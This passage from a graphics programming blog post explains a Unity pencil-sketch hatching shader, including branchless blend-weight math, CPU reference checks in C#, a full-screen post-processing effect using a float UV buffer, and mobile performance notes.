<p>We really, really, don’t want to do that in our shader, since it would mean a big unnecessary performance penalty. Instead, what we want is to write something that looks like this:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed3</span> <span class="n">rgb</span><span class="p">;</span>
<span class="n">fixed3</span> <span class="n">hatch</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">hatch0</span><span class="p">,</span> <span class="n">uv</span><span class="p">);</span>
<span class="n">rgb</span> <span class="p">+=</span> <span class="n">hatch</span><span class="p">.</span><span class="n">r</span> <span class="p">*</span> <span class="n">weight0</span><span class="p">;</span>
<span class="n">rgb</span> <span class="p">+=</span> <span class="n">hatch</span><span class="p">.</span><span class="n">g</span> <span class="p">*</span> <span class="n">weight1</span><span class="p">;</span>
<span class="n">rgb</span> <span class="p">+=</span> <span class="n">hatch</span><span class="p">.</span><span class="n">b</span> <span class="p">*</span> <span class="n">weight2</span><span class="p">;</span>
<span class="p">...</span></code></pre></figure>
<p>Notice how in both cases we end up doing the same number of texture samples, but the second case contains no branching at all. What we need to do is calculate the weights we multiply by so that we only take data from the hatch textures we want to use. It would also be nice if those weights could be created such that the sum of the weights for the textures we want added up to 1, while the weights for the other hatch samples stayed at 0.</p>
<p>Let’s look at how to do this. Again, we have 6 textures that we need to calculate weights for, so it stands to reason that we’re going to need to compare our intensity value against 6 numbers to determine these weights. We are going to store the difference between our intensity and each of these comparing values in 2 half3s. It’s going to look like this:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">half</span> <span class="n">i</span> <span class="p">=</span> <span class="n">intensity</span> <span class="p">*</span> <span class="m">6</span><span class="p">;</span>
<span class="n">half3</span> <span class="n">intensity3</span> <span class="p">=</span> <span class="nf">half3</span><span class="p">(</span><span class="n">i</span><span class="p">,</span><span class="n">i</span><span class="p">,</span><span class="n">i</span><span class="p">);</span>
<span class="n">half3</span> <span class="n">weights0</span> <span class="p">=</span> <span class="n">intensity3</span> <span class="p">-</span> <span class="nf">half3</span><span class="p">(</span><span class="m">0</span><span class="p">,</span><span class="m">1</span><span class="p">,</span><span class="m">2</span><span class="p">);</span>
<span class="n">half3</span> <span class="n">weights1</span> <span class="p">=</span> <span class="n">intensity3</span> <span class="p">-</span> <span class="nf">half3</span><span class="p">(</span><span class="m">3</span><span class="p">,</span><span class="m">4</span><span class="p">,</span><span class="m">5</span><span class="p">);</span></code></pre></figure>
<p>There are a few things to talk about in the above snippet. First of all, why am I using integer steps instead of decimal 1/6 steps? This is to avoid multiple divisions by 6 later on. We know that at most we’re going to have 2 weights which are non-zero, and those two weights need to add up to 1, so as long as the step between each weight is 1, we can simply lerp between them and get our final answer. Note that for this to work, we also need to multiply our intensity value by 6.</p>
<p>Let’s step through the above with a sample intensity value of 0.75</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">half</span> <span class="n">i</span> <span class="p">=</span> <span class="m">0.75</span> <span class="p">*</span> <span class="m">6</span><span class="p">;</span> <span class="c1">// 4.5</span>
<span class="n">half3</span> <span class="n">intensity3</span> <span class="p">=</span> <span class="nf">half3</span><span class="p">(</span><span class="n">i</span><span class="p">,</span><span class="n">i</span><span class="p">,</span><span class="n">i</span><span class="p">);</span> <span class="c1">//(4.5,4.5,4.5)</span>
<span class="n">half3</span> <span class="n">weights0</span> <span class="p">=</span> <span class="n">intensity3</span> <span class="p">-</span> <span class="nf">half3</span><span class="p">(</span><span class="m">0</span><span class="p">,</span><span class="m">1</span><span class="p">,</span><span class="m">2</span><span class="p">);</span> <span class="c1">//(4.5,3.5,2.5)</span>
<span class="n">half3</span> <span class="n">weights1</span> <span class="p">=</span> <span class="n">intensity3</span> <span class="p">-</span> <span class="nf">half3</span><span class="p">(</span><span class="m">3</span><span class="p">,</span><span class="m">4</span><span class="p">,</span><span class="m">5</span><span class="p">);</span> <span class="c1">//(1.5,0.5,-0.5)</span></code></pre></figure>
<p>Gross, we have some weight values that are outside of our 0-1 range. That’s not going to do us any favours later on, so let’s wrap our math in saturate calls and try that again.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">half</span> <span class="n">i</span> <span class="p">=</span> <span class="m">0.75</span> <span class="p">*</span> <span class="m">6</span><span class="p">;</span> <span class="c1">// 4.5</span>
<span class="n">half3</span> <span class="n">intensity3</span> <span class="p">=</span> <span class="nf">half3</span><span class="p">(</span><span class="n">i</span><span class="p">,</span><span class="n">i</span><span class="p">,</span><span class="n">i</span><span class="p">);</span> <span class="c1">//(4.5,4.5,4.5)</span>
<span class="n">half3</span> <span class="n">weights0</span> <span class="p">=</span> <span class="nf">saturate</span><span class="p">(</span><span class="n">intensity3</span> <span class="p">-</span> <span class="nf">half3</span><span class="p">(</span><span class="m">0</span><span class="p">,</span><span class="m">1</span><span class="p">,</span><span class="m">2</span><span class="p">));</span>
<span class="c1">// weights0 = (1,1,1)</span>
<span class="n">half3</span> <span class="n">weights1</span> <span class="p">=</span> <span class="nf">saturate</span><span class="p">(</span><span class="n">intensity3</span> <span class="p">-</span> <span class="nf">half3</span><span class="p">(</span><span class="m">3</span><span class="p">,</span><span class="m">4</span><span class="p">,</span><span class="m">5</span><span class="p">));</span>
<span class="c1">//weights1 = (1,0.5,0)</span></code></pre></figure>
<p>Ok, that’s more useful! Kinda. There are still a few things to take care of here. For one, we said we needed a maximum of 2 non-zero weights, and we have 5 right now. What we need to do is get rid of the weights for our lower values, so that the only ones remaining are for the two textures we actually want. We also want those two remaining weights to add up to 1.</p>
<p>Luckily all it takes is a bit of subtraction to fix everything up:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">weights0</span><span class="p">.</span><span class="n">xy</span> <span class="p">-=</span> <span class="n">weights0</span><span class="p">.</span><span class="n">yz</span><span class="p">;</span>
<span class="n">weights0</span><span class="p">.</span><span class="n">z</span> <span class="p">-=</span> <span class="n">weights1</span><span class="p">.</span><span class="n">x</span><span class="p">;</span>
<span class="n">weights1</span><span class="p">.</span><span class="n">xy</span> <span class="p">-=</span> <span class="n">weights1</span><span class="p">.</span><span class="n">yz</span><span class="p">;</span></code></pre></figure>
<p>Nifty right? Using our example value of 0.75, this would give us two weight vectors: (0,0,0) and (0.5, 0.5, 0.0), which means that an input of 4.5 is a 50% blend of our 4th and 5th texture samples, which is exactly what we want to do!</p>
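<p>If you want to convince yourself that the subtraction really does leave at most two non-zero weights, the math is easy to replay on the CPU. What follows is a rough sketch in plain C# rather than shader code; the class and method names are invented for this example and aren’t part of the project.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">using System;

// Hypothetical helper, not part of the original project: mirrors the shader math on the CPU.
static class HatchWeightCheck
{
    static float Saturate(float v) { return Math.Min(1f, Math.Max(0f, v)); }

    // Returns the six blend weights for a given intensity.
    public static float[] Weights(float intensity)
    {
        float i = intensity * 6f;
        float[] w = new float[6];

        // Same as saturate(intensity3 - half3(0,1,2)) and saturate(intensity3 - half3(3,4,5)).
        for (int k = 0; k != 6; k++) w[k] = Saturate(i - k);

        // Each weight loses the (still unmodified) weight after it, which is what the
        // three swizzled subtractions do. The last weight has no neighbour and is left alone.
        for (int k = 0; k != 5; k++) w[k] -= w[k + 1];

        return w;
    }

    static void Main()
    {
        foreach (float intensity in new[] { 0.1f, 0.5f, 0.75f, 1.0f })
            Console.WriteLine(intensity + ": " + string.Join(", ", Weights(intensity)));
    }
}</code></pre></figure>
<p>For an intensity of 0.75 the six weights come out as 0, 0, 0, 0.5, 0.5, 0, matching the two vectors above. For intensities below 1/6, only the first weight is non-zero and it is less than 1.</p>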
<p>So now that we have our weights (named weightsA and weightsB from here on, to match the final function), the rest is just some multiply/add operations:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">half3</span> <span class="n">hatching</span> <span class="p">=</span> <span class="nf">half3</span><span class="p">(</span><span class="m">0.0</span><span class="p">,</span> <span class="m">0.0</span><span class="p">,</span> <span class="m">0.0</span><span class="p">);</span>
<span class="n">hatching</span> <span class="p">+=</span> <span class="n">hatch0</span><span class="p">.</span><span class="n">r</span> <span class="p">*</span> <span class="n">weightsA</span><span class="p">.</span><span class="n">x</span><span class="p">;</span>
<span class="n">hatching</span> <span class="p">+=</span> <span class="n">hatch0</span><span class="p">.</span><span class="n">g</span> <span class="p">*</span> <span class="n">weightsA</span><span class="p">.</span><span class="n">y</span><span class="p">;</span>
<span class="n">hatching</span> <span class="p">+=</span> <span class="n">hatch0</span><span class="p">.</span><span class="n">b</span> <span class="p">*</span> <span class="n">weightsA</span><span class="p">.</span><span class="n">z</span><span class="p">;</span>
<span class="n">hatching</span> <span class="p">+=</span> <span class="n">hatch1</span><span class="p">.</span><span class="n">r</span> <span class="p">*</span> <span class="n">weightsB</span><span class="p">.</span><span class="n">x</span><span class="p">;</span>
<span class="n">hatching</span> <span class="p">+=</span> <span class="n">hatch1</span><span class="p">.</span><span class="n">g</span> <span class="p">*</span> <span class="n">weightsB</span><span class="p">.</span><span class="n">y</span><span class="p">;</span>
<span class="n">hatching</span> <span class="p">+=</span> <span class="n">hatch1</span><span class="p">.</span><span class="n">b</span> <span class="p">*</span> <span class="n">weightsB</span><span class="p">.</span><span class="n">z</span><span class="p">;</span></code></pre></figure>
<p>Which we can further optimize by vectorizing the multiplications before we add things together:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">hatch0</span> <span class="p">=</span> <span class="n">hatch0</span> <span class="p">*</span> <span class="n">weightsA</span><span class="p">;</span>
<span class="n">hatch1</span> <span class="p">=</span> <span class="n">hatch1</span> <span class="p">*</span> <span class="n">weightsB</span><span class="p">;</span>
<span class="n">half3</span> <span class="n">hatching</span> <span class="p">=</span> <span class="n">hatch0</span><span class="p">.</span><span class="n">r</span> <span class="p">+</span>
<span class="n">hatch0</span><span class="p">.</span><span class="n">g</span> <span class="p">+</span> <span class="n">hatch0</span><span class="p">.</span><span class="n">b</span> <span class="p">+</span>
<span class="n">hatch1</span><span class="p">.</span><span class="n">r</span> <span class="p">+</span> <span class="n">hatch1</span><span class="p">.</span><span class="n">g</span> <span class="p">+</span>
<span class="n">hatch1</span><span class="p">.</span><span class="n">b</span><span class="p">;</span></code></pre></figure>
<p>There are two things to note in the above. The first is how we’re handling black. Because our effect relies on keeping the relationship of less light == denser pencil strokes, we can’t treat black as a separate texture sample, because when we move between our darkest texture and pure black we won’t be adding any more strokes. Instead, when we’re blending between our darkest two texture samples, what we’re really doing is (darkestTexture * (1.0 - i)) + (2ndDarkest * i). This is expressed above but it isn’t immediately obvious.</p>
<p>Second, you may have realized that the above all relies on a very big assumption: that our intensity will never exceed 1.0. Of course this is nonsense, but assuming it up until now has both made our math easier, and given us a fun hack to let us go to pure white when being lit very brightly. At the beginning of our math, we just need to store max(0, intensity - 1.0), and add it back at the end. For values less than 1.0, this is going to be zero and for anything super bright, it’s going to push us into pure white territory.</p>
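<p>To see the overbright term working next to the weights, here is a CPU-side sketch of the whole blend in plain C#. It assumes the six hatch samples are ordered darkest to lightest (hatch0.rgb followed by hatch1.rgb), which is what the weight math implies. The class name and the sample values in Main are made up for illustration.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">using System;

// Hypothetical CPU reference, not the shader itself.
static class HatchingReference
{
    static float Saturate(float v) { return Math.Min(1f, Math.Max(0f, v)); }

    // samples: six hatch values, assumed ordered darkest to lightest.
    public static float Hatching(float[] samples, float intensity)
    {
        // Zero for anything up to 1.0, and the excess brightness beyond that.
        float overbright = Math.Max(0f, intensity - 1f);

        float i = intensity * 6f;
        float result = overbright;
        for (int k = 0; k != 6; k++)
        {
            // Weight k is its saturated value minus the next one (the last has no next).
            float next = (k == 5) ? 0f : Saturate(i - (k + 1));
            result += samples[k] * (Saturate(i - k) - next);
        }
        return result;
    }

    static void Main()
    {
        float[] samples = { 0.1f, 0.25f, 0.4f, 0.55f, 0.7f, 0.85f }; // made-up texel values
        Console.WriteLine(Hatching(samples, 0.75f)); // halfway between samples[3] and samples[4]
        Console.WriteLine(Hatching(samples, 1.5f));  // samples[5] plus 0.5 of overbright
    }
}</code></pre></figure>
<p>Once the intensity goes past 1.0, every saturate call clamps to 1, so only the lightest sample keeps a weight and the overbright value is stacked on top of it.</p>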
<p>Altogether, the hatching function looks like this:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed3</span> <span class="nf">Hatching</span><span class="p">(</span><span class="n">float2</span> <span class="n">_uv</span><span class="p">,</span> <span class="n">half</span> <span class="n">_intensity</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">half3</span> <span class="n">hatch0</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_Hatch0</span><span class="p">,</span> <span class="n">_uv</span><span class="p">).</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">half3</span> <span class="n">hatch1</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_Hatch1</span><span class="p">,</span> <span class="n">_uv</span><span class="p">).</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">half3</span> <span class="n">overbright</span> <span class="p">=</span> <span class="nf">max</span><span class="p">(</span><span class="m">0</span><span class="p">,</span> <span class="n">_intensity</span> <span class="p">-</span> <span class="m">1.0</span><span class="p">);</span>
<span class="n">half3</span> <span class="n">weightsA</span> <span class="p">=</span> <span class="nf">saturate</span><span class="p">((</span><span class="n">_intensity</span> <span class="p">*</span> <span class="m">6.0</span><span class="p">)</span> <span class="p">+</span> <span class="nf">half3</span><span class="p">(-</span><span class="m">0</span><span class="p">,</span> <span class="p">-</span><span class="m">1</span><span class="p">,</span> <span class="p">-</span><span class="m">2</span><span class="p">));</span>
<span class="n">half3</span> <span class="n">weightsB</span> <span class="p">=</span> <span class="nf">saturate</span><span class="p">((</span><span class="n">_intensity</span> <span class="p">*</span> <span class="m">6.0</span><span class="p">)</span> <span class="p">+</span> <span class="nf">half3</span><span class="p">(-</span><span class="m">3</span><span class="p">,</span> <span class="p">-</span><span class="m">4</span><span class="p">,</span> <span class="p">-</span><span class="m">5</span><span class="p">));</span>
<span class="n">weightsA</span><span class="p">.</span><span class="n">xy</span> <span class="p">-=</span> <span class="n">weightsA</span><span class="p">.</span><span class="n">yz</span><span class="p">;</span>
<span class="n">weightsA</span><span class="p">.</span><span class="n">z</span> <span class="p">-=</span> <span class="n">weightsB</span><span class="p">.</span><span class="n">x</span><span class="p">;</span>
<span class="n">weightsB</span><span class="p">.</span><span class="n">xy</span> <span class="p">-=</span> <span class="n">weightsB</span><span class="p">.</span><span class="n">yz</span><span class="p">;</span>
<span class="n">hatch0</span> <span class="p">=</span> <span class="n">hatch0</span> <span class="p">*</span> <span class="n">weightsA</span><span class="p">;</span>
<span class="n">hatch1</span> <span class="p">=</span> <span class="n">hatch1</span> <span class="p">*</span> <span class="n">weightsB</span><span class="p">;</span>
<span class="n">half3</span> <span class="n">hatching</span> <span class="p">=</span> <span class="n">overbright</span> <span class="p">+</span> <span class="n">hatch0</span><span class="p">.</span><span class="n">r</span> <span class="p">+</span>
<span class="n">hatch0</span><span class="p">.</span><span class="n">g</span> <span class="p">+</span> <span class="n">hatch0</span><span class="p">.</span><span class="n">b</span> <span class="p">+</span>
<span class="n">hatch1</span><span class="p">.</span><span class="n">r</span> <span class="p">+</span> <span class="n">hatch1</span><span class="p">.</span><span class="n">g</span> <span class="p">+</span>
<span class="n">hatch1</span><span class="p">.</span><span class="n">b</span><span class="p">;</span>
<span class="k">return</span> <span class="n">hatching</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If we plug that into our pixel shader like so:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span> <span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">color</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">fixed3</span> <span class="n">diffuse</span> <span class="p">=</span> <span class="n">color</span><span class="p">.</span><span class="n">rgb</span> <span class="p">*</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">rgb</span> <span class="p">*</span> <span class="nf">dot</span><span class="p">(</span><span class="n">_WorldSpaceLightPos0</span><span class="p">,</span> <span class="nf">normalize</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">nrm</span><span class="p">));</span>
<span class="k">fixed</span> <span class="n">intensity</span> <span class="p">=</span> <span class="nf">dot</span><span class="p">(</span><span class="n">diffuse</span><span class="p">,</span> <span class="nf">fixed3</span><span class="p">(</span><span class="m">0.2126</span><span class="p">,</span> <span class="m">0.7152</span><span class="p">,</span> <span class="m">0.0722</span><span class="p">));</span>
<span class="n">color</span><span class="p">.</span><span class="n">rgb</span> <span class="p">=</span> <span class="nf">Hatching</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span> <span class="p">*</span> <span class="m">8</span><span class="p">,</span> <span class="n">intensity</span><span class="p">);</span>
<span class="k">return</span> <span class="n">color</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>We end up with a lovely hatch material:</p>
<p>Last thing to note here is that I’m multiplying the input UVs by 8 when I pass them to the hatch function. This is purely a hack because I think it looks better with the hatch textures I’m using. YMMV, especially if you’re generating your own TAM.</p>
<h2 id="a-post-processing-effect">A Post Processing Effect</h2>
<p>So now that we have the basic effect, it’s time to do something more exciting with it. Moving this to a post effect makes it much easier to use in a project, and do fun things like integrate with other effects, like a vignette:</p>
<p>But for now, I’m just going to walk through turning this into a plain old full screen sketch effect:</p>
<p>This is surprisingly straightforward. We’re already rendering the entire scene with lighting in our main pass, which means that we can pull our intensity value from there. This has the advantage of letting us sketchify scenes using complicated materials or Unity’s dynamic GI without us having to think about anything. Other than that, about the only thing we need is the UVs of the objects we’re shading.</p>
<p>But as is usually the case with graphics, we need to do a bit of setup first:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="p">[</span><span class="nf">RequireComponent</span><span class="p">(</span><span class="k">typeof</span><span class="p">(</span><span class="n">Camera</span><span class="p">))]</span>
<span class="k">public</span> <span class="k">class</span> <span class="nc">PencilSketchPostEffect</span> <span class="p">:</span> <span class="n">MonoBehaviour</span>
<span class="p">{</span>
<span class="k">public</span> <span class="kt">float</span> <span class="n">bufferScale</span> <span class="p">=</span> <span class="m">1.0f</span><span class="p">;</span>
<span class="k">public</span> <span class="n">Shader</span> <span class="n">uvReplacementShader</span><span class="p">;</span>
<span class="k">public</span> <span class="n">Material</span> <span class="n">compositeMat</span><span class="p">;</span>
<span class="k">private</span> <span class="n">Camera</span> <span class="n">mainCam</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">int</span> <span class="n">scaledWidth</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">int</span> <span class="n">scaledHeight</span><span class="p">;</span>
<span class="k">private</span> <span class="n">Camera</span> <span class="n">effectCamera</span><span class="p">;</span>
<span class="k">void</span> <span class="nf">Start</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">Application</span><span class="p">.</span><span class="n">targetFrameRate</span> <span class="p">=</span> <span class="m">120</span><span class="p">;</span>
<span class="n">mainCam</span> <span class="p">=</span> <span class="n">GetComponent</span><span class="p"><</span><span class="n">Camera</span><span class="p">>();</span>
<span class="n">effectCamera</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">GameObject</span><span class="p">().</span><span class="n">AddComponent</span><span class="p"><</span><span class="n">Camera</span><span class="p">>();</span>
<span class="p">}</span>
<span class="k">void</span> <span class="nf">Update</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">bufferScale</span> <span class="p">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="nf">Clamp</span><span class="p">(</span><span class="n">bufferScale</span><span class="p">,</span> <span class="m">0.0f</span><span class="p">,</span> <span class="m">1.0f</span><span class="p">);</span>
<span class="n">scaledWidth</span> <span class="p">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span> <span class="p">*</span> <span class="n">bufferScale</span><span class="p">);</span>
<span class="n">scaledHeight</span> <span class="p">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">Screen</span><span class="p">.</span><span class="n">height</span> <span class="p">*</span> <span class="n">bufferScale</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>If you’re familiar with my previous posts, this should look very familiar. All we’re doing is setting up our effect to use a second camera, and updating some variables to scale any buffers we need to create. Simple stuff. The fun starts inside OnRenderImage:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">private</span> <span class="k">void</span> <span class="nf">OnRenderImage</span><span class="p">(</span><span class="n">RenderTexture</span> <span class="n">src</span><span class="p">,</span> <span class="n">RenderTexture</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">effectCamera</span><span class="p">.</span><span class="nf">CopyFrom</span><span class="p">(</span><span class="n">mainCam</span><span class="p">);</span>
<span class="n">effectCamera</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">position</span> <span class="p">=</span> <span class="n">transform</span><span class="p">.</span><span class="n">position</span><span class="p">;</span>
<span class="n">effectCamera</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">rotation</span> <span class="p">=</span> <span class="n">transform</span><span class="p">.</span><span class="n">rotation</span><span class="p">;</span>
<span class="c1">//render scene into a UV buffer</span>
<span class="n">RenderTexture</span> <span class="n">uvBuffer</span> <span class="p">=</span> <span class="n">RenderTexture</span><span class="p">.</span><span class="nf">GetTemporary</span><span class="p">(</span><span class="n">scaledWidth</span><span class="p">,</span> <span class="n">scaledHeight</span><span class="p">,</span> <span class="m">24</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">ARGBFloat</span><span class="p">);</span>
<span class="n">effectCamera</span><span class="p">.</span><span class="nf">SetTargetBuffers</span><span class="p">(</span><span class="n">uvBuffer</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">uvBuffer</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="n">effectCamera</span><span class="p">.</span><span class="nf">RenderWithShader</span><span class="p">(</span><span class="n">uvReplacementShader</span><span class="p">,</span> <span class="s">""</span><span class="p">);</span>
<span class="n">compositeMat</span><span class="p">.</span><span class="nf">SetTexture</span><span class="p">(</span><span class="s">"_UVBuffer"</span><span class="p">,</span> <span class="n">uvBuffer</span><span class="p">);</span>
<span class="c1">//Composite pass with packed TAMs</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">,</span> <span class="n">compositeMat</span><span class="p">);</span>
<span class="n">RenderTexture</span><span class="p">.</span><span class="nf">ReleaseTemporary</span><span class="p">(</span><span class="n">uvBuffer</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Again, mostly, this is all the same as previous effects. We copy the settings we need from the main camera to the effect camera, create our temporary buffer to render UVs into, and then render the scene UVs.</p>
<p>Once we have our UV buffer populated, we pass it to our composite shader, which does the rest of the work.</p>
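<p>One small thing to watch: the clamp in Update allows a bufferScale of 0, which would ask for a zero-sized temporary buffer. A minimal guard might look like the sketch below. The helper class is hypothetical and isn’t in the project; it only uses Mathf calls.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">using UnityEngine;

// Hypothetical helper: keeps a scaled buffer dimension at one pixel or more.
public static class BufferSizeUtil
{
    public static int Scaled(int fullSize, float scale)
    {
        // Clamp01 keeps the scale in the 0-1 range, Max stops the result reaching 0.
        return Mathf.Max(1, (int)(fullSize * Mathf.Clamp01(scale)));
    }
}</code></pre></figure>
<p>With something like this in place, scaledWidth could be computed as BufferSizeUtil.Scaled(Screen.width, bufferScale), and likewise for the height.</p>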
<p>It’s very easy to make a mistake when rendering the UV buffer. With UVs, we need much more precision than we can store in a default RT texel. Remember earlier when I was talking about needing to store the luminosity constant in a half3 because a fixed3 didn’t have enough precision? That goes double for UVs. If you forget about this and try to output your UVs to a regular buffer, you end up with a mess:</p>
<div align="center">
<img src="/images/post_images/2017-02-19/hatchbadprecision.PNG" />
<font size="2">Wrong Precision Left, Correct Precision Right</font><br /><br />
</div>
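<p>To put a rough number on that, assume the “regular” buffer stores 8 bits per channel and the hatch texture is 256 texels wide. Both are assumptions for this sketch, and the names are made up too. In plain C#:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">using System;

// Hypothetical back-of-the-envelope check, not part of the project.
static class UvPrecisionCheck
{
    // Simulates storing a 0-1 value in an 8-bit channel.
    static float QuantizeTo8Bits(float v)
    {
        return (float)Math.Round(v * 255f) / 255f;
    }

    static void Main()
    {
        const int hatchSize = 256; // assumed hatch texture width in texels
        const int tiling = 8;      // the UV multiplier used in this post

        // One 8-bit step in UV space, converted to hatch texels after tiling.
        float texelsPerStep = (1f / 255f) * tiling * hatchSize;
        Console.WriteLine("Hatch texels per 8-bit step: " + texelsPerStep);

        float u = 0.3f;
        float stored = QuantizeTo8Bits(u);
        Console.WriteLine("Stored " + u + " as " + stored + ", error in hatch texels: "
            + Math.Abs(u - stored) * tiling * hatchSize);
    }
}</code></pre></figure>
<p>Under those assumptions, neighbouring values the buffer can represent land about 8 hatch texels apart, so the pencil strokes can’t be sampled smoothly.</p>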
<p>Since we’re going to use a floating point buffer, that means that our fragment shader needs to return a float4 rather than a fixed4, so our UV replacement shader looks like this:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">float4</span> <span class="nf">frag</span> <span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">float2</span> <span class="n">uv</span> <span class="p">=</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">;</span>
<span class="k">return</span> <span class="nf">float4</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">x</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">y</span><span class="p">,</span> <span class="n">_MainTex_ST</span><span class="p">.</span><span class="n">x</span><span class="p">,</span> <span class="n">_MainTex_ST</span><span class="p">.</span><span class="n">y</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>I’m also taking the time here to output the tiling info from the main texture (_MainTex_ST.xy; the offset lives in .zw and isn’t stored here) so that we can use it later to (hopefully) get a more accurate effect.</p>
<p>Finally, the composite shader is very simple, now that you know what the hatching function is:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span> <span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">col</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">float4</span> <span class="n">uv</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_UVBuffer</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uvFlipY</span><span class="p">);</span>
<span class="n">half</span> <span class="n">intensity</span> <span class="p">=</span> <span class="nf">dot</span><span class="p">(</span><span class="n">col</span><span class="p">.</span><span class="n">rgb</span><span class="p">,</span> <span class="nf">float3</span><span class="p">(</span><span class="m">0.2126</span><span class="p">,</span> <span class="m">0.7152</span><span class="p">,</span> <span class="m">0.0722</span><span class="p">));</span>
<span class="n">half3</span> <span class="n">hatch</span> <span class="p">=</span> <span class="nf">Hatching</span><span class="p">(</span><span class="n">uv</span><span class="p">.</span><span class="n">xy</span> <span class="p">*</span> <span class="m">8</span><span class="p">,</span> <span class="n">intensity</span><span class="p">);</span>
<span class="n">col</span><span class="p">.</span><span class="n">rgb</span> <span class="p">=</span> <span class="n">hatch</span><span class="p">;</span>
<span class="k">return</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Speaking of precision though, you’ll notice that with the above code, the hack we used earlier to have very bright objects go to white no longer works. This is again because of buffer precision: the buffer that our main camera is rendering to only stores values up to 1.0, so that extra information is getting clipped before it gets to us. You can certainly make it happen (you’ll need the main camera rendering into a high precision buffer, and you’ll need the shaders on individual elements to output halfs or floats), but this violates our principle of not requiring changes to the shaders objects are using, so I’m calling it outside the scope of this post.</p>
<h2 id="performance">Performance</h2>
<p>On an iPhone 6, rendering the scene you see in the gif at the beginning of the post with a hatching shader on each robot was blazing fast (almost exactly the speed that rendering them with a diffuse shader was). However, turning on the post effect added 4 ms to the render time. This is likely due to the fact that we’re performing 4 texture lookups (main cam, uv buffer, 2 hatch textures) and a not insignificant amount of math inside the composite shader (which operates at full res).</p>
<p>I didn’t do any performance testing on desktop, mostly because after working in mobile for half a decade, it’s just easier for me to grab the numbers off of a phone. My gut says that anything a phone can do in 4 ms, my laptops can do in basically no time, but I’m basing that on basically nothing but a hunch.</p>
<h2 id="conclusion">Conclusion</h2>
<p>Firstly, all the code that I talked about is available <a href="https://github.com/khalladay/PencilSketchEffect">on github</a>. It’s GPL’ed because to the best of my knowledge, the hatch images I found were released under the GPL.</p>
